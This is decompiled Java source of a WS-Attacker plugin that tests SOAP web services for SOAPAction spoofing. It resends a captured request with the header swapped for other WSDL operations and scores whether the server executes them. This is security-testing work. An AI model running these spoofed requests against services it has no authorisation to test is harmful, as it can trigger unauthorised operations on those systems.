/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.plugin.soapActionSpoofing;

import com.eviware.soapui.impl.wsdl.WsdlInterface;
import com.eviware.soapui.impl.wsdl.WsdlOperation;
import com.eviware.soapui.impl.wsdl.WsdlRequest;
import com.eviware.soapui.impl.wsdl.WsdlSubmit;
import com.eviware.soapui.impl.wsdl.WsdlSubmitContext;
import com.eviware.soapui.impl.wsdl.support.soap.SoapUtils;
import com.eviware.soapui.impl.wsdl.support.soap.SoapVersion;
import com.eviware.soapui.model.ModelItem;
import com.eviware.soapui.model.iface.Operation;
import com.eviware.soapui.model.iface.Request;
import com.eviware.soapui.model.iface.SubmitContext;
import java.beans.PropertyChangeEvent;
import java.beans.PropertyChangeListener;
import java.util.ArrayList;
import java.util.List;
import javax.xml.soap.SOAPElement;
import javax.xml.soap.SOAPException;
import javax.xml.soap.SOAPMessage;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathExpressionException;
import javax.xml.xpath.XPathFactory;
import org.apache.xmlbeans.XmlException;
import org.w3c.dom.Document;
import org.w3c.dom.Node;
import org.xml.sax.SAXException;
import wsattacker.main.composition.plugin.AbstractPlugin;
import wsattacker.main.composition.plugin.option.AbstractOption;
import wsattacker.main.composition.plugin.option.AbstractOptionBoolean;
import wsattacker.main.composition.plugin.option.AbstractOptionChoice;
import wsattacker.main.composition.plugin.option.AbstractOptionVarchar;
import wsattacker.main.composition.testsuite.RequestResponsePair;
import wsattacker.main.plugin.PluginState;
import wsattacker.main.plugin.option.OptionSimpleBoolean;
import wsattacker.main.plugin.option.OptionSimpleVarchar;
import wsattacker.main.plugin.option.OptionSoapAction;
import wsattacker.main.testsuite.TestSuite;
import wsattacker.util.SoapUtilities;
import wsattacker.util.SortedUniqueList;

public class SoapActionSpoofing
extends AbstractPlugin
implements PropertyChangeListener {
    private static final long serialVersionUID = 2L;
    private static final String NAME = "SOAPAction Spoofing";
    private static final String DESCRIPTION = "<html><p>This attack plugin checks if the server is vulnerable to SOAPAction Spoofing.</p><p>In automatic mode, all SOAPAction Headers, which are present in the WSDL, are used.</p><p>Manual mode can be used to use only a specific operation,e.g. a public operation which does not damage the server.</p></html>";
    private static final String AUTHOR = "Christian Mainka";
    private static final String VERSION = "1.1 / 2013-06-26";
    private static final String[] CATEGORY = new String[]{"Spoofing Attacks"};
    private static final int MAXPOINTS = 3;
    private final AbstractOptionBoolean automaticOption = new OptionSimpleBoolean("Automatic", true, "Choose SOAPAction automatically");
    private final AbstractOptionChoice operationChooserOption = new OptionSoapAction("Operation", "Choose action manually");
    private final AbstractOptionVarchar actionOption = new OptionSimpleVarchar("Action", "", "Concrete action uri");
    private transient WsdlRequest originalRequest;
    private transient WsdlRequest attackRequest;
    private String originalAction;
    private final List<AbstractOption> automaticModeOptions = new ArrayList<AbstractOption>();
    private final List<AbstractOption> manualModeOption = new ArrayList<AbstractOption>();

    public void initializePlugin() {
        this.initData();
        this.initOptions();
        this.initInternalState();
    }

    public void initData() {
        this.setName(NAME);
        this.setDescription(DESCRIPTION);
        this.setAuthor(AUTHOR);
        this.setVersion(VERSION);
        this.setCategory(CATEGORY);
        this.setMaxPoints(3);
    }

    private void initOptions() {
        this.automaticOption.addPropertyChangeListener((PropertyChangeListener)this);
        this.operationChooserOption.addPropertyChangeListener((PropertyChangeListener)this);
        this.actionOption.addPropertyChangeListener((PropertyChangeListener)this);
        this.automaticModeOptions.add((AbstractOption)this.automaticOption);
        this.manualModeOption.add((AbstractOption)this.automaticOption);
        this.manualModeOption.add((AbstractOption)this.operationChooserOption);
        this.manualModeOption.add((AbstractOption)this.actionOption);
        this.getPluginOptions().setOptions(this.automaticModeOptions);
    }

    private void initInternalState() {
        this.setState(PluginState.Ready);
        this.originalRequest = null;
        this.originalAction = null;
    }

    public void attackImplementationHook(RequestResponsePair original) {
        Node originalChild;
        this.originalRequest = original.getWsdlRequest();
        this.originalAction = this.originalRequest.getOperation().getAction();
        this.attackRequest = this.originalRequest.getOperation().addNewRequest(this.getName() + " ATTACK");
        this.originalRequest.copyTo(this.attackRequest, true, true);
        try {
            originalChild = this.getBodyChild(original.getWsdlResponse().getContentAsString());
            this.info("Using first SOAP Body child '" + originalChild.getNodeName() + "' as reference");
        }
        catch (Exception e) {
            this.log().error((Object)("Could not detect first body child from response content. Plugin aborted \n" + this.originalRequest.getResponse().getContentAsString()));
            this.setState(PluginState.Failed);
            return;
        }
        if (this.automaticOption.isOn()) {
            this.info("Automatic Mode");
            this.info("Creating attack vector");
            List<String> attackActions = this.findAttackActions(this.originalRequest);
            int anz = attackActions.size();
            if (anz == 0) {
                this.info("Could not find any suitable SOAPActions\nThis could indicate, that the server does not use SOAPAction Header\nYou could also choose a SOAPAction manually");
                this.setState(PluginState.Failed);
            } else {
                this.info("Found " + anz + " suitable SOAPActions: " + attackActions.toString());
                this.trace("Starting attack for each vector");
                for (String soapAction : attackActions) {
                    if (this.getCurrentPoints() == this.getMaxPoints()) {
                        this.info("Stopping attack since we got the maximum number of points (" + this.getMaxPoints() + ")");
                        break;
                    }
                    this.doAttackRequest(this.attackRequest, soapAction, originalChild);
                }
                this.setState(PluginState.Finished);
            }
        } else {
            this.info("Manual Mode");
            this.doAttackRequest(this.attackRequest, this.actionOption.getValueAsString(), originalChild);
        }
        this.originalRequest.getOperation().removeRequest(this.attackRequest);
        this.attackRequest = null;
        this.originalAction = null;
        this.originalRequest = null;
        switch (this.getCurrentPoints()) {
            case 0: {
                this.info("(0/3) Points: No attack possible. The Web Service is not vulnerable.");
                break;
            }
            case 1: {
                this.important("(1/3) Points: The server seems to have problems with the attack vectors. It should always return a SOAP Fault.");
                break;
            }
            case 2: {
                this.critical("(2/3) Points: The server ignores SOAPAction Header.\nThis can be abused to execute unauthorized operations, if authentication is controlled by HTTP.");
                break;
            }
            case 3: {
                this.critical("(3/3) Points: The server executes the Operation specified by the SOAPAction Header.\nThis can be abused to execute unauthorized operations, if authentication is controlled by the SOAP message.");
            }
        }
    }

    @Override
    public void propertyChange(PropertyChangeEvent pce) {
        if (pce.getSource() == this.automaticOption) {
            if (this.automaticOption.isOn()) {
                this.log().info((Object)"Setting automatic mode options.");
                this.getPluginOptions().setOptions(this.automaticModeOptions);
            } else {
                this.log().info((Object)"Setting manual mode options.");
                this.getPluginOptions().setOptions(this.manualModeOption);
            }
        } else if (pce.getSource() == this.operationChooserOption) {
            try {
                String chosenOperationName = this.operationChooserOption.getValueAsString();
                String soapActionValue = TestSuite.getInstance().getCurrentInterface().getWsdlInterface().getOperationByName(chosenOperationName).getAction();
                this.log().info((Object)String.format("Setting SOAPAction: %s -> %s", chosenOperationName, soapActionValue));
                this.actionOption.setValue(soapActionValue);
            }
            catch (NullPointerException e) {
                this.actionOption.setValue("No current Service");
            }
            catch (Exception e) {
                this.actionOption.setValue("Error: " + e.getMessage());
            }
        }
        this.checkState();
    }

    public void clean() {
        this.setCurrentPoints(0);
        this.setState(PluginState.Ready);
    }

    public void stopHook() {
        if (this.originalAction != null && this.originalRequest != null && !this.originalRequest.getOperation().getAction().equals(this.originalAction)) {
            this.originalRequest.getOperation().setAction(this.originalAction);
            this.originalRequest = null;
            this.originalAction = null;
        }
        if (this.attackRequest != null) {
            this.attackRequest.getOperation().removeRequest(this.attackRequest);
            this.attackRequest = null;
        }
    }

    public boolean wasSuccessful() {
        return this.isFinished() && this.getCurrentPoints() > 1;
    }

    public AbstractOptionBoolean getAutomaticOption() {
        return this.automaticOption;
    }

    public AbstractOptionChoice getOperationChooserOption() {
        return this.operationChooserOption;
    }

    public AbstractOptionVarchar getActionOption() {
        return this.actionOption;
    }

    public Node getBodyChildWithXPath(String xmlContent) throws SAXException {
        String SEARCH = "/Envelope/Body/*[1]";
        Document doc = SoapUtilities.stringToDom((String)xmlContent);
        XPath xpath = XPathFactory.newInstance().newXPath();
        Node node = null;
        try {
            node = (Node)xpath.evaluate(SEARCH, doc, XPathConstants.NODE);
        }
        catch (XPathExpressionException e) {
            this.log().warn((Object)e);
        }
        return node;
    }

    public Node getBodyChild(String xmlContent) throws SOAPException {
        Node result = null;
        SOAPMessage sm = SoapUtilities.stringToSoap((String)xmlContent);
        List bodyChilds = SoapUtilities.getSoapChilds((SOAPElement)sm.getSOAPBody());
        if (bodyChilds.size() > 0) {
            result = (Node)bodyChilds.get(0);
        }
        return result;
    }

    public void restoreConfiguration(AbstractPlugin plugin) {
        if (plugin instanceof SoapActionSpoofing) {
            SoapActionSpoofing old = (SoapActionSpoofing)plugin;
            this.actionOption.setValue(old.getActionOption().getValue());
            this.operationChooserOption.setSelectedAsString(old.getOperationChooserOption().getValueAsString());
            this.automaticOption.setOn(old.getAutomaticOption().isOn());
        }
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    private void doAttackRequest(WsdlRequest request, String soapAction, Node originalChild) {
        this.info("Using SOAPAction Header '" + soapAction + "'");
        request.getOperation().setAction(soapAction);
        try {
            Node responseChild;
            block18: {
                WsdlSubmit submit = request.submit((SubmitContext)new WsdlSubmitContext((ModelItem)request), false);
                String responseContent = submit.getResponse().getContentAsString();
                if (responseContent == null) {
                    this.important("The server's answer was empty. Server misconfiguration?\nGot 1/3 Points");
                    this.setCurrentPoints(1);
                    return;
                }
                this.trace("Request:\n" + ((WsdlRequest)submit.getRequest()).getRequestContent() + "\n\nResponse:\n" + responseContent);
                try {
                    if (SoapUtils.isSoapFault((String)responseContent, (SoapVersion)request.getOperation().getInterface().getSoapVersion())) {
                        this.info("No attack possible, you got a SOAP error message.");
                        return;
                    }
                }
                catch (XmlException e) {
                    this.info("The answer is not valid XML. Server missconfiguration?");
                    this.setCurrentPoints(1);
                }
                try {
                    responseChild = this.getBodyChild(responseContent);
                    if (responseChild != null) break block18;
                    this.important("There is no Child in the SOAP Body. Misconfigured Server?\nGot 1/3 Points.");
                    this.setCurrentPoints(1);
                    return;
                }
                catch (SOAPException e) {
                    this.info("Could not parse response. " + e.getMessage());
                    request.getOperation().setAction(this.originalAction);
                    return;
                }
            }
            this.info("Detected first body child: '" + responseChild.getNodeName() + "'");
            if (responseChild.getNodeName().equals(originalChild.getNodeName())) {
                this.important("The server ignored the SOAPAction Header. It still executes the first child of the Body.\nGot 2/3 Points");
                this.setCurrentPoints(2);
            } else {
                this.important("The server accepts the SOAPAction Header " + soapAction + " and executes the corresponding operation.\n" + "Got 3/3 Points");
                this.setCurrentPoints(3);
            }
        }
        catch (Request.SubmitException e) {
            this.info("Could not submit the request. " + e.getMessage());
        }
        finally {
            request.getOperation().setAction(this.originalAction);
        }
    }

    private void checkState() {
        if (this.automaticOption.isOn()) {
            this.setState(PluginState.Ready);
        } else if (this.operationChooserOption.getSelectedIndex() > 0) {
            this.setState(PluginState.Ready);
        }
    }

    private List<String> findAttackActions(WsdlRequest request) {
        SortedUniqueList ret = new SortedUniqueList();
        WsdlInterface iface = request.getOperation().getInterface();
        for (Operation op : iface.getOperationList()) {
            if (!(op instanceof WsdlOperation)) continue;
            String action = ((WsdlOperation)op).getAction();
            ret.add(action);
        }
        ret.remove(request.getOperation().getAction());
        return ret;
    }
}

